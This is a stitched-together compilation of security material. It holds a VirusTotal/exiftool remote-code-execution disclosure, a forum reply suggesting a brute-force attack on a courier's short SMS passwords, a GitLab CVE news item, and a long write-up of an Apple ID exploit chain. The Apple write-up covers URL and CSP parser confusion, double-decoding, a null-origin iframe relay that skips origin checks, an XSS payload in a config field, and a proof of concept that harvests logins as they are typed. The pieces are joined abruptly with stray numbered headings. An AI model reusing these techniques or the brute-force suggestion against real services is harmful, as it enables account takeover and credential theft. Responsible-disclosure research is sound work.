The first step was uploading a DjVu file with the payload to the page https://www.virustotal.com/gui/. Virustotal.com analyzed the file, and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works, virustotal.com uses several scans. The application sent our file with the payload to several hosts to perform the scan. On VirusTotal hosts, at the moment exiftool is executed — as described for CVE-2021-22204 — instead of parsing the file's metadata, exiftool executes our payload, handing us a reverse shell on our machine.

After that we noticed it's not just a Google-controlled environment, but environments related to internal scanners and partners that assist in the VirusTotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges.

The interesting part is that every time we uploaded a file with a new hash containing a new payload, VirusTotal forwarded the payload to other hosts. So not only did we have an RCE; it was also forwarded by Google's servers to Google's internal network, its customers and partners. Various types of services were found within the networks, such as MySQL, Kubernetes, Oracle database, HTTP and HTTPS applications, metrics applications, SSH, etc. Due to this unauthorized access, it was possible to obtain sensitive and critical information such as Kubernetes tokens and certificates, service configuration info, source code, logs, etc.

We reported all the findings to Google, which fixed the issue quickly.

Disclosure process:
Report received by GoogleVRP - 04.30.2021
GoogleVRP triaged the report - 05.19.2021
GoogleVRP accepted the report as a valid report - 21.05.2021
GoogleVRP closed the report - 04.06.2021
VirusTotal was no longer vulnerable - 13.01.2022
GoogleVRP allowed publishing - 15.01.2022

Source: https://www.cysrc.com/blog/virus-total-blog
  14. Hackers: https://breached.co/index.php
  15. Gls.ro IDOR

Send them an e-mail if you want and see what they say. I think you can send them a message here: https://gls-group.eu/GROUP/en/gls_informs/safety_advice_1606mmeaxqozb E-mail: security@gls-group.eu

From what I remember, I reported a vulnerability to Canon a few years ago and they fixed the problem... I never got any response from them, not even a thank you. 🙃 I'm actually expecting a parcel from them today 😅.... as @SirGod said, the password is 4 characters long.... that's what I noticed in the SMS I received too..... See if a brute-force attack works.... I haven't tested it.

EDIT: Actually, the password I received is 5 characters long.... my bad. 😄
  16. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks.

Tracked as CVE-2021-22205, the issue relates to improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, was addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3.

In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions.

Although the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021, owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday.

Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible.

"In addition, ideally, GitLab should not be an internet-facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here.

Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
  17. Everyone knows what's inside a computer isn't really real. It pretends to be, sure, hiding just under the pixels — but I promise you it isn't. In the real world, everything has a certain mooring we're all attuned to. You put money in a big strong safe, and, most likely, if somehow it opens there will be a big sound, and a big hole. Everything has a footprint, everything has a size, there are always side-effects. As the electrons wiggle, they're expressing all these abstract ideas someone thought up sometime. Someone had an idea of how they'd dance, but that's not always true. Instead, there are half-formed ideas, ideas that change context and meaning when exposed to others, and ideas that never really quite made sense.

The Alice in Wonderland secret of computers is that the dancers and their music are really the same. It's easy to mistakenly believe that each word I type is shuffled by our pixie friends along predefined chutes and conveyors to make what we see on screen, when in reality each letter is just a few blits and bloops away from being something else entirely. Sometimes, if you're careful, you can make all those little blits and bloops line up in a way that makes the dance change, and that's why I've always loved hacking computers: all those little pieces that were never meant to be put together that way align in unintended but beautiful order. Each individual idea unwittingly becomes part of a greater and irrefutable whole.

Before the pandemic, I spent a lot of time researching the way the web of YouTube, Wikipedia and Twitter meets the other world of Word, Photoshop and Excel to produce Discord, 1Password, Spotify, iTunes, Battle.net and Slack. Here all the wonderful and admittedly very pointy and sharp benefits of the web meet the somewhat softer underbelly of the 'Desktop Application', the consequences of which I summarised one sunny day in Miami. I'm not really a very good security researcher, so little of my work sees the light of day because the words don't always form up in the right order, but my experience then filled me with excitement to publish more. And so, sitting again under the fronds of that tumtum tree, I found more — and I promise you what I found then was as exciting as what I'll tell you about now. But I can't tell you about those.

Perhaps naïvely, it didn't occur to me before that the money companies give you for your security research is hush money, but I know that now — and I knew that then, when I set out to hack Apple ID. At the time, Apple didn't have any formal way of paying you for bugs: you just emailed them and hoped for the best. Maybe you'd get something, maybe you wouldn't — but there is certainly nothing legally binding about sending an email in the way submitting a report to HackerOne is. That appealed to me.

Part 1: The Doorman's Secret

Computer systems don't tend to just trust each other, especially on the web. The times they do usually end up being mistakes. Let me ask you this: when you sign into Google, do you expect it to know what you watched on Netflix? Of course not. That's down to a basic rule of the web: different websites don't share information with each other by default.

iCloud, then, is a bit of a curiosity. It has its own domain, icloud.com, entirely separate from Apple's usual apple.com, yet its core feature is of course logging into your Apple iCloud account.
More interestingly still, you might notice that most login systems — for, say, Google — redirect you through a common login domain like accounts.google.com, but iCloud's doesn't. Behind the looking-glass, Apple has made this work by having iCloud include a webpage that is located on the AppleID server, idmsa.apple.com. The page is located at this address:

https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&language=en_US&iframeId=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https://www.icloud.com&response_type=code&response_mode=web_message&state=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&authVersion=latest

Here, Apple is using OAuth 2, a capability-based authentication framework. 'Capability based' is key here, because it means that a login from apple.com doesn't necessarily equate to one from icloud.com, and also not all iCloud logins are necessarily the same either — that's how Find My manages to skip a second-factor check to find your phone. This allows Apple to (to some extent) reduce the blast radius of security issues that might otherwise touch iCloud. This is modified, however, to allow the login to work embedded in another page; response_mode=web_message seems to be a switch that turns this on.

If you visit the address, you'll notice the page is just blank. This is for good reason: if anyone could just show the Apple iCloud login page, then you could play around with the presentation of the login page to steal Apple user data (a 'redress attack'). Apple's code detects that it's not being put in the right place and blanks out the page.

In typical OAuth, the 'redirect_uri' specifies where the access is being sent to; in a normal, secure form, the redirect URI gets checked against what's registered for the other, 'client_id' parameter to make sure that it's safe for Apple to send the special keys that grant access there — but here, there's no redirect that would cause that. In this case the redirect_uri parameter is being used for a different purpose: to specify the domain that can embed the login page.

In a twist of fate, this one fell prey to a similar bug to the one from "how to hack the uk tax system, i guess", which is that web addresses are extraordinarily hard to compare safely. Necessarily, something like this parameter must pass through several software systems, which individually probably have subtly different ways of interpreting the information. For us to be able to bypass this security control, we want the redirect_uri checker on the AppleID server to think icloud.com, and other systems to think something else. URLs — web addresses — are the perfect conduit for this. Messing with the embed in situ in the iCloud page with Chrome DevTools, I found that a redirect_uri of 'https://abc@www.icloud.com' would pass just fine, despite it being a really weird way of saying the same thing.
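That "weird way of saying the same thing" is easy to verify yourself: the WHATWG URL parser treats everything before the '@' as userinfo, so the origin is unchanged. A quick check in a browser console or Node:

// "abc" parses as userinfo, not as the host, so the origin the
// server compares against is still www.icloud.com.
const u = new URL("https://abc@www.icloud.com");
console.log(u.username); // "abc"
console.log(u.hostname); // "www.icloud.com"
console.log(u.origin);   // "https://www.icloud.com"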
The next part of the puzzle is how we get the iCloud login page into our page. Consult this reference on embed control:

  • X-Frame-Options: DENY — prevents any kind of embedding. Pros: ancient, everyone supports it. Cons: the kids will laugh at you; if you want only some embedding, you need some complicated and unreliable logic.
  • X-Frame-Options: ALLOW-FROM http://example.com — only allows embedding from a specific place. Pros: a really good idea from a security perspective. Cons: was literally only supported by Firefox and Internet Explorer for a short time, so using it will probably make you less secure.
  • Content-Security-Policy: frame-ancestors — only allows embedding from specific place(s). Pros: new and cool, there are probably TikToks about how to use it; prevents embeds-in-embeds bypassing your controls. Cons: probably very old browsers will ignore it.

If you check Chrome DevTools' 'Network' panel, you will find the AppleID sign-on page uses both X-Frame-Options: ALLOW-FROM (which essentially does nothing) and Content-Security-Policy: frame-ancestors. Here's a cut-down version of what the Content-Security-Policy header looks like when 'redirect_uri' is set to the default "https://www.icloud.com/":

Content-Security-Policy: frame-ancestors 'self' https://www.icloud.com

This directs the browser to only allow embeds in iCloud. Next, what about our weirder redirect_uri, https://abc@www.icloud.com?

Content-Security-Policy: frame-ancestors 'self' https://abc@www.icloud.com

Very interesting! Now, humans are absolute fiends for context clues. Human language is all about throwing a bunch of junk together and having it all picked up in context, but computers have a beautiful, childlike innocence toward them. Thus, I can set redirect_uri to 'https://mywebsite.com;@www.icloud.com/'; then, the AppleID server continues to think all is well, but sends:

Content-Security-Policy: frame-ancestors 'self' https://mywebsite.com;@www.icloud.com

This is because the 'URI' language that's used to express web addresses is contextually different from the language used to express Content Security Policies. 'https://mywebsite.com;@www.icloud.com' is a totally valid URL, meaning the same as 'https://www.icloud.com', but to Content-Security-Policy the same statement means 'https://mywebsite.com' and then some extra garbage which gets ignored after the ';'. Using this, we can embed the Apple ID login page in our own page.

However, not everything is quite as it seems. If you fail to be able to embed a page in Chrome, you get this cute lil guy. But instead, we get a big box of absolutely nothing:
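The one-string, two-grammars divergence is easy to reproduce in a console. A sketch — the naive split below only mirrors how ';' terminates a CSP directive; it is not a full CSP parser:

// One string, two grammars (browser console or Node).
const value = "https://mywebsite.com;@www.icloud.com";

// 1. As a URL: ';' is legal inside userinfo, so the host is icloud.com.
console.log(new URL(value).origin); // "https://www.icloud.com"

// 2. As a CSP header: ';' terminates the directive, so the last source
//    token the browser sees in frame-ancestors is our site.
const header = "frame-ancestors 'self' " + value;
const directive = header.split(";")[0]; // "frame-ancestors 'self' https://mywebsite.com"
console.log(directive.split(/\s+/).pop()); // "https://mywebsite.com"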
Part 2: Communicating with the blank box

Our big box, though blank, is not silent. When our page loads, the browser console gives us the following cryptic message:

{"type":"ERROR","title":"PMRPErrorMessageSequence","message":"APPLE ID : PMRPC Message Sequence log fail at AuthWidget.","iframeId":"601683d3-4d35-4edf-a33e-6d3266709de3","details":"{\"m\":\"a:28632989 b:DEA2CA08 c:req h:rPR e:wSR:SR|a:28633252 b:196F05FD c:req h:rPR e:wSR:SR|a:28633500 b:DEA2CA08 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28633598 b:B74DD348 c:req h:rPR e:wSR:SR|a:28633765 b:196F05FD c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634110 b:BE7671A8 c:req h:rPR e:wSR:SR|a:28634110 b:B74DD348 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634621 b:BE7671A8 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28635123 b:E6F267A9 c:req h:rPR e:wSR:SR|a:28635130 b:25A38CEC c:req h:r e:wSR:SR|a:28635635 b:E6F267A9 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28636142 b:25A38CEC c:rRE f:Application error. Destination unavailable. 1000 h:r e:f2:rRE\",\"pageVisibilityState\":\"visible\"}"}

This message is mostly useless for discerning what exactly is going wrong. At this point, I like to dig more into the client code itself to work out the context of this error. The Apple ID application is literally millions of lines of code, but I have better techniques — in this case, if we check the Network panel in Chrome DevTools, we can see that when an error occurs, a request is sent to 'https://idmsa.apple.com/appleauth/jslog', presumably to report to Apple that an error occurred.

Chrome DevTools' 'Sources' panel has a component on the right called "XHR/fetch Breakpoints" which can be used to stop the execution of the program when a particular web address is requested. Using this, we can pause the application at the point the error occurs, and ask our debugger to go backwards to the condition that caused the failure in the first place. Eventually, stepping backward, there's this:

new Promise(function(e, n) {
  it.call({
    destination: window.parent,
    publicProcedureName: "ready",
    params: [{ iframeTitle: d.a.getString("iframeTitle") }],
    onSuccess: function(t) { e(t) },
    onError: function(t) { n(t) },
    retries: p.a.meta.FEConfiguration.pmrpcRetryCount,
    timeout: p.a.meta.FEConfiguration.pmrpcTimeout,
    destinationDomain: p.a.destinationDomain
  })
})

The important part here is window.parent, which is our fake version of iCloud. It looks like the software inside AppleID is trying to contact our iCloud parent when the page is ready, and failing over and over (see: retries). This communication is happening over postMessage (the 'pm' of pmrpc). Lastly, the code is targeting a destinationDomain, which is likely set to something like https://www.icloud.com; then, since our embedding page is not that domain, there's a failure.

We can inject code into the AppleID Javascript and the iCloud Javascript to view their version of this conversation:

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"receivePingRequest","params":["ready"],"id":"9BA799AA-6777-4DCC-A615-A8758C9E9CE2"}
AppleID tells iCloud it's ready to receive messages.

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"9BA799AA-6777-4DCC-A615-A8758C9E9CE2","result":true}
iCloud responds to the ping request with a 'pong' response.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"ready","params":[{"iframeTitle":" Sign In with Your Apple ID"}],"id":"E0236187-9F33-42BC-AD1C-4F3866803C55"}
AppleID tells iCloud that the frame is named 'Sign in with Your Apple ID' (I'm guessing to make the title of the page correct).

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"E0236187-9F33-42BC-AD1C-4F3866803C55","result":true}
iCloud acknowledges receipt of the title.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"receivePingRequest","params":["config"],"id":"87A8E469-8A6B-4124-8BB0-1A1AB40416CD"}
AppleID asks iCloud if it wants the login to be configured.

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"87A8E469-8A6B-4124-8BB0-1A1AB40416CD","result":true}
iCloud acknowledges receipt of the configuration request, and says that it does, yes, want the login to be configured.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"config","params":[],"id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B"}
AppleID asks iCloud for a login dialog configuration.
iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ … ]ErkJggg==","width":"100px"}}}}
iCloud configures the login dialog. This includes data like the iCloud logo to display, the caption "Sign in to iCloud", and, for example, whether a link should be provided for if the user forgets their password.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":true}
AppleID confirms receipt of the login configuration.

In order to make our bootleg iCloud work, we will need code that completes the conversation in the same way. You can look at a version I made, here. Our next problem is that destinationDomain I pointed out before: postMessage ensures that snot-nosed kids trying to impersonate iCloud can't just do that, by having every postMessage carry a targetOrigin, basically a specified destination webpage. It's not enough that the message gets sent to window.parent; that parent must also be securely specified to prevent information going the wrong place.

Part 3: Snot-Nosed Kid Mode

This one isn't as easy as reading what AppleID does and copying it. We need to find another security flaw between our single input, redirect_uri, through to destinationDomain, and then finally on to postMessage. Again, the goal here is to find some input redirect_uri that still holds the exploit conditions from Part 1, but also introduces new exploit conditions for this security boundary. By placing a breakpoint at the destinationDomain line we had before, we can see that unlike both the AppleID server and Content-Security-Policy, the whole redirect_uri parameter, 'https://mywebsite.com;@www.icloud.com', is being passed to postMessage, as though it were this code:

window.parent.postMessage(data_to_send, "https://mywebsite.com;@www.icloud.com");

At first, this seems like an absolute impasse. In no possible way is our page going to be at the address 'https://mywebsite.com;@www.icloud.com'. However, once you go from the reference documentation to the technical specification, the plot very much thickens. In section 9.4.3 of the HTML standard, the algorithm for comparing postMessage origins is specified, and step 5 looks like this:

Let parsedURL be the result of running the URL parser on targetOrigin.
If parsedURL is failure, then throw a "SyntaxError" DOMException.
Set targetOrigin to parsedURL's origin.

Crucially, despite "https://mywebsite.com;@www.icloud.com" being not at all a valid place to send a postMessage, the algorithm extracts a valid origin from it (i.e. it becomes https://www.icloud.com). Again, this gives us purchase to sneak some extra content in there to potentially confuse other parts of AppleID's machinery. The source for the AppleID login page starts with a short preamble that tells the AppleID login framework what the destination domain (in this case iCloud) is for the purpose of login: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;@www.icloud.com"); This information eventually bubbles down to the destinationDomain we're trying to mess with. 
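Both halves of this parser disagreement are easy to reproduce yourself. A quick sketch you can run in any browser console (my own illustration, not the article's code; behaviour per the WHATWG URL parser and the CSP grammar):

const weird = new URL("https://mywebsite.com;@www.icloud.com");
console.log(weird.origin);   // "https://www.icloud.com"
console.log(weird.username); // "mywebsite.com%3B" (our junk, tucked into userinfo)

// CSP, by contrast, splits its source list on whitespace, and ';' terminates
// the whole directive: "frame-ancestors 'self' https://mywebsite.com;@www.icloud.com"
// yields the sources 'self' and https://mywebsite.com, with "@www.icloud.com"
// left over as a bogus directive name that browsers silently ignore.

That same origin-extraction step is exactly what postMessage's targetOrigin comparison performs, which is the foothold for everything that follows.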
When toying with 'redirect_uri', I found that there's a bug in the way this functionality is programmed in Apple's server. For an input 'https://mywebsite.com;"@www.icloud.com' (note the double quote), this code is produced: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); The double quote is 'escaped' with a '\' to ensure that we don't break out of the quoted section and start executing our own code. However, something a little odd happens when we instead input 'https://mywebsite.com;%22@www.icloud.com'. '%22' is what you get from 'encodeURIComponent' of a double quote, the opposite of what Apple is doing here. bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); We get exactly the same response! This means that Apple is already doing a decodeURIComponent on the server before the value even reaches this generated Javascript. Then, the generated Javascript performs the same decoding again. Someone made the mistake of doing the same decoding on both the client and the server, but it didn't become a functionality-breaking bug because the intended usage doesn't have any doubly encoded components. We can, however, introduce these. 😉 Because the server is using the once-decodeURIComponent-ed form, and the client is using the twice-decodeURIComponent-ed form, we can doubly encode special modifier characters in our URI that we want only the client to see — while still passing all the server-side checks! After some trial and error, I determined that I can set redirect_uri to: https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com

This order of operations then happens:

1. AppleID's server decodeURIComponent-s it, producing: https://mywebsite.com%3F mywebsite.com;@www.icloud.com
2. AppleID's server parses the origin from https://mywebsite.com%3F mywebsite.com;@www.icloud.com, and gets https://www.icloud.com, which passes the first security check.
3. AppleID's server takes the once-decodeURIComponent-ed form and sends Content-Security-Policy: frame-ancestors https://mywebsite.com%3F mywebsite.com;@www.icloud.com
4. The browser parses the Content-Security-Policy directive and parses out origins again, allowing embedding of the iCloud login from both 'https://mywebsite.com%3f' (which is nonsense) and 'mywebsite.com' (which is us!!!!). This passes the second security check and allows the page to continue loading.
5. AppleID's server generates the sign-in page with the Javascript bootData.destinationDomain = decodeURIComponent("https://mywebsite.com%3F mywebsite.com;@www.icloud.com");
6. The second decodeURIComponent sets bootData.destinationDomain to https://mywebsite.com? mywebsite.com;@www.icloud.com
7. When the AppleID client tries to send data to www.icloud.com, it sends it to https://mywebsite.com? mywebsite.com;@www.icloud.com
8. The browser, when performing postMessage, parses an origin yet again (!!) from https://mywebsite.com? mywebsite.com;@www.icloud.com. The '?' causes everything after it to be ignored, resulting in the target origin 'https://mywebsite.com'. This passes the third security check.

However, this is only half of our problems, and our page will stay blank. Here's what a blank page looks like, for reference:

Part 4: Me? I'm Nobody.

Though now we can get messages from iCloud, we cannot perform full initialisation of the login dialog without also sending them. However, AppleID checks the senders of all messages it gets, and that mechanism is also totally different from the one that is used for a postMessage send. 
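Before digging into that mechanism, the Part 3 decode chain is worth seeing end to end in code. A minimal sketch (my own reconstruction, with illustrative variable names; behaviour per decodeURIComponent and the WHATWG URL parser):

// What the attacker submits as redirect_uri:
const submitted = "https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com";

// Decode #1 happens on Apple's server:
const serverSide = decodeURIComponent(submitted);
// "https://mywebsite.com%3F mywebsite.com;@www.icloud.com"
console.log(new URL(serverSide).origin); // "https://www.icloud.com" → server check passes

// Decode #2 happens in the generated bootData Javascript:
const clientSide = decodeURIComponent(serverSide);
// "https://mywebsite.com? mywebsite.com;@www.icloud.com"
console.log(new URL(clientSide).origin); // "https://mywebsite.com" → postMessage comes to us

One input, two different origins, depending purely on how many times it has been decoded.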
The lowest-level browser mechanism that AppleID must inevitably be calling sadly does not perform some abusable parse step beforehand. A typical message origin check looks like this: if (message.origin != "https://safesite.com") throw new Error("hey!! thats illegal!"); This is just a 'strict string comparison', which means that we would, in theory, have to impossibly be the origin https://mywebsite.com? mywebsite.com;@www.icloud.com, which has no chance of ever happening on God's green earth. However, the PMRPC protocol is actually open source, and we can view its own version of this check online. Receipt of a message is handled by 'processJSONRpcRequest', defined in 'pmrpc.js'. Line 254 decides if the request needs to be checked for security via an ACL (Access Control List) as follows: 254: !serviceCallEvent.shouldCheckACL || checkACL(service.acl, serviceCallEvent.origin) This checks a value called 'shouldCheckACL' to determine if security is disabled, I guess 😉 That value, in turn, comes from line 221: 221: shouldCheckACL : !isWorkerComm And then isWorkerComm comes to us via lines 205–206: 205: var eventSource = eventParams.source; 206: var isWorkerComm = typeof eventSource !== "undefined" && eventSource !== null; 'eventParams' is the event representing the postMessage, and 'event.source' is a reference to the window (i.e. page) that sent the message. I'd summarise this check as follows: if (message.source !== null && !(message.origin === "https://mywebsite.com? mywebsite.com;@www.icloud.com")) That means the origin check is completely skipped if message.source is 'null'. Now, I believe the intention here is to allow rapid testing of pmrpc-based applications: if you are making up a test message for testing, its 'source' can then be set to 'null', and then you no longer need to worry about security getting in the way. Good thing section 9.4.3, step 8.3 of the HTML standard says a postMessage event's source is always a 'WindowProxy object', so it can never be 'null' instead, right? Ah, but section 8.6 of the HTML standard defines an iframe sandboxing flag, 'allow-same-origin', which, if not present in a sandboxed iframe, sets the 'sandboxed origin browsing context flag' (defined in section 7.5.3), which 'forces the content into a unique origin' (defined in section 7.5.5), which makes the window an 'opaque origin' (defined in section 7.5), which when given to Javascript is turned into null (!!!!). This means that when we create an embedded, sandboxed frame, as long as we don't provide the 'allow-same-origin' flag, we create a special window that is considered to be null, and thus bypasses the pmrpc security check on received messages. A 'null' page, however, is heavily restricted, and, importantly, if our attack page identifies as null via this trick, all the other checks we worked so hard to bypass will fail. Instead, we can embed both Apple ID, with all the hard work we did before, and a 'null' page. We can still postMessage to the null page, so we use it to forward our messages on to Apple ID, which thinks, since it is a 'null' window, it must have generated them itself. You can read my reference implementation of this forwarding code, here.

Part 5: More than Phishing

Now that AppleID thinks we're iCloud, we can mess around with all of those juicy settings that it gets. How about offering a free Apple gift card to coerce the user into entering their credentials? 
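(Recapping the Part 4 relay in code before we continue: this is my own minimal sketch of the technique, not the author's linked implementation, and the frame layout and payload are illustrative assumptions.)

// Attacker page: frames[0] is assumed to be the embedded AppleID iframe
// from Part 3. Create a second, sandboxed iframe WITHOUT "allow-same-origin",
// so it runs in an opaque ("null") origin.
const relay = document.createElement("iframe");
relay.setAttribute("sandbox", "allow-scripts");
relay.srcdoc = `<script>
  // Runs in the null-origin frame. Forward anything the attacker page sends
  // us into the AppleID frame; cross-origin WindowProxy objects still expose
  // postMessage and indexed frame access.
  window.addEventListener("message", function (e) {
    parent.frames[0].postMessage(e.data, "*");
  });
<\/script>`;
document.body.appendChild(relay);

relay.onload = () => {
  // Any pmrpc payload pushed through the relay now reaches AppleID from a
  // window it treats as "null", so pmrpc skips its origin/ACL check.
  // (The actual pmrpc conversation payloads are the ones from Part 2.)
  relay.contentWindow.postMessage('pmrpc.{"jsonrpc":"2.0", ... }', "*");
};

The "*" targetOrigin is tolerable here only because the relay frame is ours and carries no secrets; replies from AppleID still flow to the attacker page thanks to the Part 3 destinationDomain confusion.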
In our current state, having tricked Apple ID into thinking that we're iCloud, we have a little box that fills in your Apple email very nicely. When you log in to our embed, we get an authentication for your Apple account over postMessage. Even if you don't 2FA! This is because an authentication token is granted without passing 2FA for iCloud 'Find My', used for finding your potentially lost phone (which you might otherwise need in order to pass 2FA). However, this is basically phishing — although this is extremely high-tech phishing, I have no doubt the powers that be will argue that you could just make a fake AppleID page just the same. We need more. We're already in a position of extreme privilege. Apple ID thinks we're iCloud, so it's likely that the Apple ID system will be a lot more trusting of what we ask of it. As noted before, we can set a lot of configuration settings that affect how the login page is displayed:

pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ ... ]ErkJggg==","width":"100px"}}}}

That's all well and good, but what about the options that iCloud can use but simply chooses not to? They won't be here, but we can use Chrome DevTools' 'code search' feature to search all the code the Apple ID client software uses. 'signInLabel' makes a good search term as it probably doesn't turn up anywhere else:

d()(w.a, "envConfigFromConsumer.signInLabel", "").trim() && n.attr("signInLabel", w.a.envConfigFromConsumer.signInLabel),

It looks like all of these settings like 'signInLabel' are part of this 'envConfigFromConsumer', so we can search for that:

this.attr("testIdpButtonText", d()(w.a, "envConfigFromConsumer.testIdpButtonText", "Test")) d()(w.a, "envConfigFromConsumer.accountName", "").trim() ? (n.attr("accountName", w.a.envConfigFromConsumer.accountName.trim()), n.attr("showCreateLink", d()(w.a, "envConfigFromConsumer.features.createLink", !0)), n.attr("showiForgotLink", d()(w.a, "envConfigFromConsumer.features.iForgotLink", !0)), n.attr("learnMoreLink", d()(w.a, "envConfigFromConsumer.learnMoreLink", void 0)), n.attr("privacyText", d()(w.a, "envConfigFromConsumer.privacy", void 0)), n.attr("showFooter", d()(w.a, "envConfigFromConsumer.features.footer", !1)), n.attr("showRememberMe") && ("remember-me" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() ? n.attr("rememberMeText", l.a.getString("rememberMe")) : "keep-me-signed-in" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() && n.attr("rememberMeText", l.a.getString("keepMeSignedIn")), n.attr("isRememberMeChecked", !!d()(w.a, "envConfigFromConsumer.features.selectRememberMe", !1) || !!d()(w.a, "accountName", "").trim())), i = d()(w.a, "envConfigFromConsumer.verificationToken", ""),

These values we know from our config get given different names to put into a template. For example, 'envConfigFromConsumer.features.footer' becomes 'showFooter'. 
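Those template names matter because of how they will be interpolated. As a quick standalone demo of the distinction that becomes important below (this uses the public handlebars npm package, not Apple's code):

// npm install handlebars
const Handlebars = require("handlebars");

const escaped   = Handlebars.compile("<div>{{x}}</div>");
const unescaped = Handlebars.compile("<div>{{{x}}}</div>");
const payload   = { x: "<img src=x onerror=alert(document.domain)>" };

console.log(escaped(payload));
// <div>&lt;img src&#x3D;x onerror&#x3D;alert(document.domain)&gt;</div>
// (inert, HTML-escaped text)
console.log(unescaped(payload));
// <div><img src=x onerror=alert(document.domain)></div>
// (live, injected HTML)

Keep the triple-brace behaviour in mind while reading on.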
In DevTools' network panel, we can search all resources the page uses, code and otherwise, for where these inputs end up:

{{#if showRememberMe}} <div class="si-remember-password"> <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked"> <label id="remember-me-label" class="form-label" for="remember-me"> <span class="form-choice-indicator"></span> {{rememberMeText}} </label> </div>

What a lovely blast from the past! These are handlebars templates, a bastion of the glorious web 2.0 era I started my career in tech in! Handlebars has a bit of a dirty secret. '{{value}}' statements work like you expect, safely putting content into the page; but '{{{value}}}' extremely unsafely injects potentially untrusted HTML code — and for most inputs looks just the same! Let's see if an Apple engineer made a typo by searching the templates for "}}}":

{{#if showLearnMoreLink}} <div> {{{learnMoreLink}}} </div> {{/if}} {{#if showPrivacy}} <div class="label-small text-centered centered tk-caption privacy-wrapper"> <div class="privacy-icon"></div> {{{privacyText}}} </div> {{/if}}

Perfect! From our previous research, we know that 'privacyText' comes from the configuration option 'envConfigFromConsumer.privacy', or just 'privacy'. Once we re-configure our client to send the configuration option { "privacy": "<img src=fake onerror='alert(document.domain)'" }, Apple ID will execute our code and show a little popup indicating what domain we have taken over:

Part 6: Overindulgence

Now it's time to show off. Proof of concepts are all about demonstrating impact, and a little pop-up window isn't scary enough. We have control over idmsa.apple.com, the Apple ID server's browser client, and so we can access all the credentials saved there — your Apple login and cookie — and, in theory, we can 'jump' to other Apple login windows. Those credentials are all stored in a form that we can use to take over an Apple account, but they're not a username and password, which is what I think of as properly scary. For my proof of concept, I:

1. Execute my full exploit chain to take over Apple ID. This requires only one click from the user.
2. Present the user with a 'login with AppleID' button by deleting all the content of the Apple ID login page and replacing it with the standard button.
3. Open a new window to the real, full Apple ID login page, same as Apple would when the button is clicked.
4. With our control of idmsa.apple.com, take control of the real Apple ID login dialog and inject our own code, which harvests the logins as they are typed.
